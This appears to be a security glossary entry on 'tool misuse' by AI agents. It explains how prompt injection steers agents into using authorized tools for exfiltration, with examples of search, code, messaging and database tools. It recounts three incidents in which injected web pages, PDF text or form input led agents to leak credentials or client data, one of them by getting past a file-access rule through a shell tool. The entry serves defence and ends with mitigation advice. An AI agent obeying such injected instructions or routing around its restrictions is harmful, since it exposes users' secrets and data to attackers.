Tool Misuse

Tool misuse (in the AI agent context) is an attack in which an adversary manipulates an agent into using its legitimate, authorized tools in unintended ways — turning approved capabilities into exfiltration channels, privilege escalation vectors, or mechanisms for unauthorized harm. The tools work exactly as designed. That's the problem.

What Is Tool Misuse?

AI agents are powerful because they can use tools: call APIs, search the web, execute code, read and write files, send messages, query databases. Tool use is the mechanism by which agents affect the world.

Tool misuse exploits the gap between what a tool is authorized for and what that tool can physically do. Authorization is defined by policy ("this tool should only be used for X"). Capability is defined by reality ("this tool can physically do Y, Z, and also X"). An attacker who can influence the agent's reasoning — via prompt injection, poisoned memory, or manipulated task context — can direct the agent to use a tool in its full capability range, not just its intended range.

The critical distinction from other attack types: the agent isn't doing anything it wasn't technically allowed to do. The tool access is real. The tool call is valid. The harm is entirely a function of the agent being directed toward a use case the designer didn't intend.

Why Authorization and Capability Diverge

When developers give an agent a tool, they think about what the tool is for. Security teams think about what the tool can do. Those are different questions, and in production systems they're almost never fully reconciled.

Examples of the gap:

A web search tool is for finding information. It can also make arbitrary HTTP GET requests, with user-controlled query parameters, to any URL — including attacker-controlled endpoints. If the URL includes exfiltrated data in the query string, web search becomes an exfiltration channel.
A code execution tool is for running legitimate code. It can also write to arbitrary filesystem paths, make outbound network connections, and spawn subprocesses that bypass file access policies applied at the agent layer.
A send-message tool is for notifying users. It can also send messages to arbitrary recipients, including external parties and attacker-controlled webhooks.
A database query tool is for reading relevant records. It can also, if permissions aren't scoped, access every record in the database.

Real Examples

Google Antigravity IDE (November 2025). Gemini, manipulated via prompt injection in a poisoned web page, collected AWS credentials from the workspace's .env file. The file access tool was restricted from files in .gitignore. The attacker's payload recognized this constraint and used the run_command tool instead — a shell execution tool that operated below the file access policy layer. Two tools, each with legitimate use cases. Combined under adversarial direction, they became a credential exfiltration chain.

Notion 3.0 (September 2025). Notion's AI agent had a web search tool for looking up information. Hidden text in a PDF instructed the agent to search for a specific URL — one that included the victim's client list as a query parameter. The search tool fetched the URL. The attacker's server logged the query parameters. The client list was exfiltrated via a search that "succeeded" from the tool's perspective.

Salesforce AgentForce (September 2025). A malicious Web-to-Lead form submission triggered the agent to use its legitimate lead-management tools to exfiltrate lead contact data to an expired domain that had been re-registered by the attacker. The domain was still in Salesforce's CSP allowlist. The exfiltration was, from the tool's perspective, a valid outbound call to an approved domain.

Defense

Tool misuse can't be fully stopped at the behavioral layer — you can't write a system prompt that covers every possible misuse of every tool. The structural approach:

Minimal tool scope. Give agents only the tools they need for the specific task. An agent that summarizes documents doesn't need outbound HTTP capabilities. An agent that answers customer questions doesn't need database write access.

Outbound egress controls. Treat agent outbound network calls as a security boundary, not a convenience feature. Enforce allowlists at the network layer, not just in the system prompt. Audit what domains agents actually call in production.

Tool call logging and anomaly detection. Every tool call should be logged with full arguments. Unusual tool invocations — a search query with a long random-looking string as the search term, a file write to a path outside the expected workspace — should trigger review.

Segregation of powerful tools. Tools with significant capability (code execution, file write, external HTTP) should require explicit task-level justification and, for high-stakes operations, human approval. Don't co-locate powerful tools with untrusted-content processing.

FAQ

Is tool misuse the same as prompt injection? Prompt injection is usually the mechanism; tool misuse is often the consequence. An attacker uses prompt injection to influence the agent's reasoning, then the agent executes the attack via tool misuse. They're distinct concepts but frequently co-occur in real attacks.

Can tool call signing prevent this? Signing tool calls (so that only verified tool invocations execute) would help, but it doesn't exist in current production frameworks. Even if it did, it would prevent unauthorized tool access — not the misuse of authorized access.

Does least-privilege access actually help if the agent is already compromised? Yes — this is the entire point. If the agent can only search, it can't exfiltrate via file reads or code execution. If the search tool only calls approved domains, it can't exfiltrate to attacker infrastructure. Structural controls limit damage even after compromise. That's the definition of blast radius containment.

Tool Misuse

What Is Tool Misuse?

Why Authorization and Capability Diverge

Real Examples

Defense

FAQ

Related Terms